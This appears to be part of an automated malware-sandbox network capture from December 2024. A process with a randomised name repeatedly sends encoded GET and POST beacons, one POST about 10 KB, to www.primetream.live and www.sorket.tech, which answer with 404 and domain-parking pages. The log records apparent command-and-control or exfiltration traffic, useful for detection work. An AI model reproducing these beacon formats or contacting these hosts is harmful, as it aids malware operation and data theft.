                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49857 | 162.0.236.169 | 80 | 1228 | C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 24, 2024 11:36:56.798919916 CET | 424 | OUT | GET /8t9s/?APatc2S=cQOSSB92WrTaqBxCYQmY0/8zd7KVOpZ6t2v2QQp7ftKEyFsbpuIbzJ+m0CFldn0ugFGiUddTcSTZ3FmKLOS+RDlSRV2taFz1Xj7dqojcNfOZnPX4GO36V4Y=&3FNHL=wVCtFrFXof HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.primetream.live
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
Dec 24, 2024 11:36:58.015944958 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Tue, 24 Dec 2024 10:36:57 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 389
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49875 | 199.59.243.227 | 80 | 1228 | C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 24, 2024 11:37:03.887119055 CET | 682 | OUT | POST /4emb/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.sorket.tech
                                                                                                                    Origin: http://www.sorket.tech
                                                                                                                    Referer: http://www.sorket.tech/4emb/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 204
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 31 57 38 72 65 57 64 4a 4d 4b 70 77 70 52 75 59 50 62 73 62 4f 75 2f 69 63 30 33 2b 2b 5a 77 5a 34 6d 39 36 6d 70 41 5a 6d 37 39 65 4b 4f 77 79 4c 45 30 4c 4c 68 65 48 43 30 4d 55 65 74 71 76 67 38 4c 79 6a 47 35 36 63 76 6f 6e 41 6a 34 48 55 79 4b 68 35 41 58 53 71 7a 67 63 33 4f 37 4b 48 6e 6a 50 54 51 35 38 33 53 73 33 78 2b 7a 51 7a 63 77 67 4a 46 53 38 6e 34 49 72 6b 4f 46 55 31 51 59 42 77 43 43 65 44 32 51 32 63 47 65 46 59 55 63 55 79 67 2b 58 71 73 57 65 48 49 56 6c 37 6d 72 66 53 2b 31 47 72 4a 66 75 2f 72 30 4d 73 33 55 51 4d 66 49 49 43 6d 41 48 52 66 38 35 70 67 3d 3d
                                                                                                                    Data Ascii: APatc2S=1W8reWdJMKpwpRuYPbsbOu/ic03++ZwZ4m96mpAZm79eKOwyLE0LLheHC0MUetqvg8LyjG56cvonAj4HUyKh5AXSqzgc3O7KHnjPTQ583Ss3x+zQzcwgJFS8n4IrkOFU1QYBwCCeD2Q2cGeFYUcUyg+XqsWeHIVl7mrfS+1GrJfu/r0Ms3UQMfIICmAHRf85pg==
Dec 24, 2024 11:37:04.969744921 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                    date: Tue, 24 Dec 2024 10:37:04 GMT
                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                    content-length: 1110
                                                                                                                    x-request-id: 154ee364-e0c4-4400-aefd-00e5458a5237
                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                    vary: sec-ch-prefers-color-scheme
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TVHTMTW7daZ53Re6NgttbXfBf9SzUy9497SW8NlFMSQhjdK8a9glB0Qo4Q06seRWYw0P4x5AT7aX3x7HYdHi9g==
                                                                                                                    set-cookie: parking_session=154ee364-e0c4-4400-aefd-00e5458a5237; expires=Tue, 24 Dec 2024 10:52:04 GMT; path=/
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 54 56 48 54 4d 54 57 37 64 61 5a 35 33 52 65 36 4e 67 74 74 62 58 66 42 66 39 53 7a 55 79 39 34 39 37 53 57 38 4e 6c 46 4d 53 51 68 6a 64 4b 38 61 39 67 6c 42 30 51 6f 34 51 30 36 73 65 52 57 59 77 30 50 34 78 35 41 54 37 61 58 33 78 37 48 59 64 48 69 39 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TVHTMTW7daZ53Re6NgttbXfBf9SzUy9497SW8NlFMSQhjdK8a9glB0Qo4Q06seRWYw0P4x5AT7aX3x7HYdHi9g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Dec 24, 2024 11:37:04.969778061 CET | 563 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTU0ZWUzNjQtZTBjNC00NDAwLWFlZmQtMDBlNTQ1OGE1MjM3IiwicGFnZV90aW1lIjoxNzM1MDM2Nj


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49881 | 199.59.243.227 | 80 | 1228 | C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 24, 2024 11:37:06.556735039 CET | 702 | OUT | POST /4emb/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.sorket.tech
                                                                                                                    Origin: http://www.sorket.tech
                                                                                                                    Referer: http://www.sorket.tech/4emb/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 224
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 31 57 38 72 65 57 64 4a 4d 4b 70 77 70 78 65 59 44 61 73 62 49 4f 2f 68 42 45 33 2b 77 35 77 64 34 6d 35 36 6d 6f 55 4a 36 5a 4a 65 4b 72 55 79 49 42 41 4c 4d 68 65 48 4e 55 4e 51 47 4e 71 6b 67 38 48 51 6a 48 46 36 63 76 38 6e 41 6e 30 48 56 42 53 67 34 51 58 55 2f 6a 67 65 70 2b 37 4b 48 6e 6a 50 54 51 73 52 33 52 63 33 77 50 44 51 79 39 77 2f 56 56 53 2f 78 49 49 72 67 4f 46 51 31 51 59 2f 77 44 75 77 44 31 6f 32 63 47 4f 46 5a 46 63 58 37 67 2f 39 75 73 58 41 47 5a 67 63 2b 45 65 79 4b 65 41 6e 70 38 37 4d 36 74 35 57 39 47 31 48 65 66 73 37 66 68 4a 7a 63 63 42 77 79 76 57 46 50 43 58 7a 48 48 2f 49 4b 50 47 63 6c 53 4a 6d 70 6e 55 3d
                                                                                                                    Data Ascii: APatc2S=1W8reWdJMKpwpxeYDasbIO/hBE3+w5wd4m56moUJ6ZJeKrUyIBALMheHNUNQGNqkg8HQjHF6cv8nAn0HVBSg4QXU/jgep+7KHnjPTQsR3Rc3wPDQy9w/VVS/xIIrgOFQ1QY/wDuwD1o2cGOFZFcX7g/9usXAGZgc+EeyKeAnp87M6t5W9G1Hefs7fhJzccBwyvWFPCXzHH/IKPGclSJmpnU=
Dec 24, 2024 11:37:07.638219118 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                    date: Tue, 24 Dec 2024 10:37:06 GMT
                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                    content-length: 1110
                                                                                                                    x-request-id: dc1a5f75-c8e1-4ec1-99b5-75df764223fb
                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                    vary: sec-ch-prefers-color-scheme
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TVHTMTW7daZ53Re6NgttbXfBf9SzUy9497SW8NlFMSQhjdK8a9glB0Qo4Q06seRWYw0P4x5AT7aX3x7HYdHi9g==
                                                                                                                    set-cookie: parking_session=dc1a5f75-c8e1-4ec1-99b5-75df764223fb; expires=Tue, 24 Dec 2024 10:52:07 GMT; path=/
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 54 56 48 54 4d 54 57 37 64 61 5a 35 33 52 65 36 4e 67 74 74 62 58 66 42 66 39 53 7a 55 79 39 34 39 37 53 57 38 4e 6c 46 4d 53 51 68 6a 64 4b 38 61 39 67 6c 42 30 51 6f 34 51 30 36 73 65 52 57 59 77 30 50 34 78 35 41 54 37 61 58 33 78 37 48 59 64 48 69 39 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TVHTMTW7daZ53Re6NgttbXfBf9SzUy9497SW8NlFMSQhjdK8a9glB0Qo4Q06seRWYw0P4x5AT7aX3x7HYdHi9g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Dec 24, 2024 11:37:07.638253927 CET | 563 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZGMxYTVmNzUtYzhlMS00ZWMxLTk5YjUtNzVkZjc2NDIyM2ZiIiwicGFnZV90aW1lIjoxNzM1MDM2Nj


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49888 | 199.59.243.227 | 80 | 1228 | C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 24, 2024 11:37:09.320632935 CET | 10784 | OUT | POST /4emb/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.sorket.tech
                                                                                                                    Origin: http://www.sorket.tech
                                                                                                                    Referer: http://www.sorket.tech/4emb/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 10304
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 31 57 38 72 65 57 64 4a 4d 4b 70 77 70 78 65 59 44 61 73 62 49 4f 2f 68 42 45 33 2b 77 35 77 64 34 6d 35 36 6d 6f 55 4a 36 5a 78 65 4c 5a 63 79 4c 6d 63 4c 4e 68 65 48 45 30 4e 54 47 4e 71 31 67 38 66 55 6a 48 4a 41 63 73 45 6e 42 43 6f 48 53 77 53 67 32 51 58 55 39 6a 67 66 33 4f 36 51 48 6e 7a 44 54 51 38 52 33 52 63 33 77 4e 62 51 37 4d 77 2f 58 56 53 38 6e 34 49 4f 6b 4f 46 6f 31 51 67 76 77 44 71 4f 44 6b 49 32 63 69 53 46 66 7a 77 58 30 67 2b 62 70 73 58 49 47 5a 38 39 2b 45 43 51 4b 63 68 79 70 36 48 4d 34 62 6b 64 34 30 77 51 63 4a 45 37 41 78 5a 6c 54 76 31 75 30 73 6d 75 4f 42 54 66 48 48 76 69 4a 76 66 49 6e 6a 46 68 32 53 31 32 65 45 37 44 6a 65 49 61 50 61 4e 4d 50 36 6f 49 72 4b 68 39 65 69 4b 2f 56 63 36 75 74 46 46 32 4f 68 51 64 65 63 58 5a 78 70 4b 38 66 43 73 78 77 7a 4a 67 6f 36 69 54 35 31 2b 54 34 67 78 39 65 44 46 48 6a 47 31 37 7a 31 66 6f 4f 58 4b 72 57 75 34 77 72 32 6b 71 65 77 67 38 63 7a 69 68 48 46 32 52 43 59 52 77 66 67 30 52 70 72 73 37 4d 54 [TRUNCATED]
Data Ascii: APatc2S=[TRUNCATED]
Dec 24, 2024 11:37:10.415359020 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                    date: Tue, 24 Dec 2024 10:37:09 GMT
                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                    content-length: 1110
                                                                                                                    x-request-id: cb6fb606-5b60-4752-aa7e-1d46488f883e
                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                    vary: sec-ch-prefers-color-scheme
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TVHTMTW7daZ53Re6NgttbXfBf9SzUy9497SW8NlFMSQhjdK8a9glB0Qo4Q06seRWYw0P4x5AT7aX3x7HYdHi9g==
                                                                                                                    set-cookie: parking_session=cb6fb606-5b60-4752-aa7e-1d46488f883e; expires=Tue, 24 Dec 2024 10:52:10 GMT; path=/
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 54 56 48 54 4d 54 57 37 64 61 5a 35 33 52 65 36 4e 67 74 74 62 58 66 42 66 39 53 7a 55 79 39 34 39 37 53 57 38 4e 6c 46 4d 53 51 68 6a 64 4b 38 61 39 67 6c 42 30 51 6f 34 51 30 36 73 65 52 57 59 77 30 50 34 78 35 41 54 37 61 58 33 78 37 48 59 64 48 69 39 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TVHTMTW7daZ53Re6NgttbXfBf9SzUy9497SW8NlFMSQhjdK8a9glB0Qo4Q06seRWYw0P4x5AT7aX3x7HYdHi9g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Dec 24, 2024 11:37:10.415412903 CET | 563 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiY2I2ZmI2MDYtNWI2MC00NzUyLWFhN2UtMWQ0NjQ4OGY4ODNlIiwicGFnZV90aW1lIjoxNzM1MDM2Nj


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49896 | 199.59.243.227 | 80 | 1228 | C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 24, 2024 11:37:11.990228891 CET | 420 | OUT | GET /4emb/?APatc2S=4UULdis/QLNauySAEekUDYGsEUzq6e4B9T06+64m5ppnN51KKUcjYDTfNmInUMaV4Nrjr2QNBcJEKgo4MRK3zTGcylMwgMm1Um/ECC9y2F4s+sXg4aJXZlc=&3FNHL=wVCtFrFXof HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.sorket.tech
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                     Dec 24, 2024 11:37:13.071743011 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                    date: Tue, 24 Dec 2024 10:37:12 GMT
                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                    content-length: 1466
                                                                                                                    x-request-id: 5689b0bd-c9c9-45d0-9527-19bcf0c129be
                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                    vary: sec-ch-prefers-color-scheme
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_SV7UIkMxuZZt+QcRwILjmddlsF3mjDxqrMl+7Q4+OyyrAzCq+i+qjuYx35y/CVmvdTrs5GkxRf+zP0wTgDLU9g==
                                                                                                                    set-cookie: parking_session=5689b0bd-c9c9-45d0-9527-19bcf0c129be; expires=Tue, 24 Dec 2024 10:52:12 GMT; path=/
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 53 56 37 55 49 6b 4d 78 75 5a 5a 74 2b 51 63 52 77 49 4c 6a 6d 64 64 6c 73 46 33 6d 6a 44 78 71 72 4d 6c 2b 37 51 34 2b 4f 79 79 72 41 7a 43 71 2b 69 2b 71 6a 75 59 78 33 35 79 2f 43 56 6d 76 64 54 72 73 35 47 6b 78 52 66 2b 7a 50 30 77 54 67 44 4c 55 39 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_SV7UIkMxuZZt+QcRwILjmddlsF3mjDxqrMl+7Q4+OyyrAzCq+i+qjuYx35y/CVmvdTrs5GkxRf+zP0wTgDLU9g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                     Dec 24, 2024 11:37:13.071909904 CET | 919 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTY4OWIwYmQtYzljOS00NWQwLTk1MjctMTliY2YwYzEyOWJlIiwicGFnZV90aW1lIjoxNzM1MDM2Nj


                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
